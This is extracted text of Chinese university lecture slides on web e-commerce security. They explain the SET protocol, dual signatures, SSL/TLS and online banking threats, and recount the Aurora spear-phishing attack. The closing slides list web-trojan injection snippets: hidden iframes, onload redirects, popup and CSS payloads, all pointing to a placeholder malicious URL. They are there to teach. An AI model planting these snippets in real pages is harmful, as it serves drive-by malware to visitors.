第12章Web电子商务安全.

1Web电子商务安全第十二章主讲人：任凯联系方式：renkai_jlxy@163.com百度云盘：信息安全技术2第十二章WEB电子商务安全12.1电子商务概述12.2安全电子商务的体系结构12.3安全电子交易SET12.4安全套接字层SSL12.5数字现金协议12.6网上银行信息安全技术6背景：VISA与MASTERCARD两大信用卡国际组织共同发起制定保障在因特网上进行安全电子交易的SET(SecureElectronicTransaction)协议由众多信息产业公司，如Microsoft、Netscape、RSA等共同协作发展而成用途：围绕客户、商家等交易各方相互之间身份的确认，采用了电子证书等技术，以保障交易安全12.3安全电子交易SET信息安全技术712.3.1SET协议概述SET协议主要内容加密算法（RSA和DES）的应用证书消息和对象格式购买消息和对象格式付款消息和对象格式参与者之间的消息协议信息安全技术812.3.1SET协议概述SET支付系统中的相关成员：持卡人发卡银行收单银行支付网关商家认证机关信息安全技术91.SET协议消息传输过程SET协议消息发送过程:数字信封：将对称密钥通过非对称公钥加密的结果分发对称密钥的方法明文摘要散列加密密文证书私钥对称密钥收方公钥数字信封发方证书数字签名发送发方加密12.3.2SET协议工作原理信息安全技术101.SET协议消息传输过程SET协议消息接收过程：收方数字信封收方私钥解密对称密钥密文解密明文发方证书数字签名解密散列摘要摘要比较相同则正确不同则错误12.3.2SET协议工作原理信息安全技术11(1)消费者互联网购买的物品并形成订货单。订货单上需包括在线商店、购买物品名称及数量、交货时间及地点等相关信息(2)消费者选择付款方式、确认订单、签发付款指令。SET开始介入(3)在SET中，消费者必须对订单和付款指令进行数字签名，同时利用双重签名技术保证商家看不到消费者的账号信息(4)在线商店接受订单后，向消费者所在银行请求支付认可。信息通过支付网关到持卡人的发卡银行请求支付认可。批准交易后，返回确认信息给电商(5)电商发送订单确认信息给消费者(6)电商发送货物或提供服务，支付网关通知发卡银行请求支付(7)消费者确认收货后，支付网关支付给收款银行2.SET协议流程12.3.2SET协议工作原理信息安全技术123.双重签名产生背景：消费者不想让银行看到订单细节，同时也不想让商家看到银行支付信息例如消息A是订单信息，消息B是支付信息，或者互换一下消息A摘要消息B摘要签名双重签名消息A消息B摘要发送12.3.2SET协议工作原理信息安全技术13双重签名消息A消息B摘要散列消息A摘要验证3.双重签名消息的验证例如消息A是订单信息，消息B是支付信息12.3.1SET协议工作原理信息安全技术14Netscape公司开发的一个网络安全协议已成为事实上的安全网上交易标准协议三个版本：SSL1.0SSL2.0SSL3.0IETF发布了TLS(TransportLayerSecurity),TLS1.0通常被称作SSL3.1TLS1.1TLS1.2SSL与SET最大不同在于SSL是一个双方协议，仅提供通信双方的安全保证，而SET协议则提供通信多方的安全保证SSL比SET简单得多，目前在Web服务中已广泛使用12.4安全套接字层SSL(SecureSocketsLayer，SSL）信息安全技术1512.4.1SSL概述SSL功能：客户认证服务器身份服务器认证客户身份客户与服务器自动协商生成密钥加密客户与服务器间的数据，并可抵御重放攻击检测客户与服务器间数据的完整性信息安全技术161.SSL协议体系结构SSL仅被广泛用于HTTP连接SSL位于TCP和应用层协议(如HTTP)之间理论上，SSL可以运行于任何TCP/IP应用程序之上，而不用对其做任何修改TCPSSL握手协议SSL改变密码规范协议SSL告警协议HTTPTelnetSSL记录协议IP…12.4.2SSL工作原理信息安全技术17SSL记录协议在客户机和服务器之间传输应用数据和SSL控制数据2.SSL记录协议应用层数据分段1分段2分段1分段1MAC码分段1MAC码分段1MAC码H分段压缩计算MAC码加密添加SSL记录协议首部…………12.4.2SSL工作原理信息安全技术182.SSL记录协议SSL记录协议报文格式：内容类型主版本次版本压缩长度明文(压缩)MAC(0,16或20字节)加密的12.4.2SSL工作原理信息安全技术19NetworkandInformationSecurity12.4.2SSL工作原理3.SSL改变密码规范协议和告警协议信息安全技术205.SSL握手协议：该协议允许客户和服务器相互验证、协商加密和MAC算法以及密钥，用来保护SSL记录发送的数据。ClientHelloServerHelloCertificateCertificateRequestServerHelloDoneCertificateCertificateVerifyChangeCipherSpecFinishedChangeCipherSpecFinished客户服务器协商协议版本，会话ID，密码组，压缩方法，交换随机数发送服务器证书，请求客户证书(可选)如果要求证书，客户发送该证书改变密码组，完成握手12.4.2SSL工作原理信息安全技术2212.6网上银行网络钓鱼(SpearPhishing)极光行动（Aurora）2009年12月中旬可能源自中国“精心策划且目标明确”的一场网络攻击，其名称“Aurora”（意为极光、欧若拉）来自攻击者电脑上恶意文件所在路径的一部分。遭受攻击的除了Google外，还有20多家公司：其中包括AdobeSystems、JuniperNetworks、Rackspace、雅虎、赛门铁克、诺斯洛普·格鲁门和陶氏化工Google表示有部分知识产权遭到盗窃。它认为，黑客的主要兴趣在于访问中国持不同政见者的Gmail帐户美国国务卿希拉里·克林顿发表了一则简短声明谴责此次攻击事件，并要求中国作出回应[12]。中国政府当时并未做出正式回应美国国会计划对Google的指控进行调查，后者指控中国政府利用计算机服务监视人权活动人士信息安全技术2312.6网上银行网络钓鱼(SpearPhishing)极光行动（Aurora）攻击过程回放：搜集Google员工在Facebook、Twitter等社交网站上发布的信息；利用动态DNS供应商建立托管伪造照片网站的Web服务器，Google员工收到来自信任的人发来的网络链接并且点击，含有shellcode的JavaScript造成IE浏览器溢出，远程下载并运行程序；通过SSL安全隧道与受害人机器建立连接，持续监听并最终获得该雇员访问Google服务器的帐号密码等信息；使用该雇员的凭证成功渗透进入Google邮件服务器，进而不断获取特定Gmail账户的邮件内容信息信息安全技术2412.6网上银行网络钓鱼(SpearPhishing)极光行动（Aurora）从用户单击钓鱼邮件那一刻开始讲起1.三次握手建立连接2.攻击者的机器收到一个GET请求3.数据包6返回了一个302码（重定向页面）4.从Details面板中可以看到一个Location域，它指明重定向位置是/info?rFfWELUjLJHpP在第9包上右击“FollowTCPStream”信息安全技术2512.6网上银行病毒信息安全技术2612.6网上银行信息安全技术2712.6网上银行根据显示的内容找到25包信息安全技术2812.6网上银行已经获得了无限制的管理权限信息安全技术2912.6网上银行一些常用的挂马方式框架挂马iframesrc=网马地址width=0height=0/iframebody挂马bodyonload=window.location='网马地址';/bodyjava挂马scriptlanguage=javascriptwindow.open(网马地址,,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1);/scriptjs文件挂马将代码“document.write(iframewidth=0height=0src='网马地址'/iframe);”保存为muma.js文件，则js文件挂马代码为“scriptlanguage=javascriptsrc=muma.js/script”信息安全技术3012.6网上银行一些常用的挂马方式：css中挂马body{background-image:url('javascript:document.write(scriptsrc=)')}高级欺骗ahref=(迷惑连接地址)onMouseOver=muma();returntrue;搜狐首页/ascriptlanguage=javascriptfunctionmuma(){open(网马地址,,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1);}/script